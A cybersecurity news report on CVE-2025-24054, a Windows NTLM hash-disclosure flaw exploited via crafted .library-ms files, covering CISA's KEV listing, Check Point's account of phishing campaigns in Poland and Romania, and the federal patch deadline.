CVE-2025-24054 Under Active Attack- Stealing NTLM Credentials During File Download
Following indications of active exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a medium-severity security flaw affecting Microsoft Windows to its Known Exploited Vulnerabilities (KEV) list on Thursday.
Microsoft fixed the Windows New Technology LAN Manager (NTLM) hash disclosure spoofing issue last month as part of its Patch Tuesday releases. It was given the CVE identifier CVE-2025-24054 (CVSS score: 6.5).
Last year, Microsoft formally deprecated NTLM, a traditional authentication mechanism, in favor of Kerberos. Threat actors have discovered a number of ways to take advantage of the technology in recent years, including relay attacks and pass-the-hash, in order to get NTLM hashes for further assaults.
“Microsoft Windows NTLM contains an external control of file name or path vulnerability that allows an unauthorized attacker to perform spoofing over a network,” CISA stated.
Microsoft stated in a March bulletin that the vulnerability might be activated by “selecting (single-click), inspecting (right-click), or performing an action other than opening or executing the file,” which are basic interactions with a specially designed .library-ms file.
Rintaro Koike at NTT Security Holdings, 0x6rss, and j00sean were also thanked by the tech giant for identifying and reporting the vulnerability.
Even though Microsoft rated CVE-2025-24054 as “Exploitation Less Likely,” as of March 19, the security hole was being actively exploited, according to Check Point, which enables malicious actors to compromise computers and expose user passwords or NTLM hashes.
According to the cybersecurity firm, “a campaign targeted government and private institutions in Poland and Romania around March 20–21, 2025.” “Attackers used malspam to distribute a Dropbox link containing an archive that exploited multiple known vulnerabilities, including CVE-2025-24054, to harvest NTLMv2-SSP hashes.”
The vulnerability is rated as a variation of CVE-2024-43451 (CVSS score: 6.5), which was fixed by Microsoft in November 2024 and has also been used as a weapon in assaults against Colombia and Ukraine by threat actors such as Blind Eagle and UAC-0194.
Check Point claims that because the material is transmitted using ZIP archives, Windows Explorer will automatically send an SMB authentication request to a remote server and reveal the user’s NTLM hash just by downloading and extracting the contents of the archive.
However, as recently as March 25, 2025, another phishing effort was discovered that was transmitting a file called “Info.doc.library-ms” without any compression. At least ten campaigns with the ultimate objective of obtaining NTLM hashes from the targeted victims have been spotted since the initial wave of assaults.
“These attacks leveraged malicious .library-ms files to collect NTLMv2 hashes and escalate the risk of lateral movement and privilege escalation within compromised networks,” according to Check Point.
“This quick exploitation emphasizes how important it is for businesses to install fixes right away and make sure that NTLM vulnerabilities are fixed in their systems. The issue poses a serious risk because it requires little user involvement to activate and attackers may easily get NTLM hashes, particularly when those hashes can be utilized in pass-the-hash attacks.
By May 8, 2025, Federal Civilian Executive Branch (FCEB) entities must implement the needed remedies to address the vulnerability in order to protect their networks from active exploitation.
Source: Hackernews
For more Cybersecurity news, explore at TechNewsy.
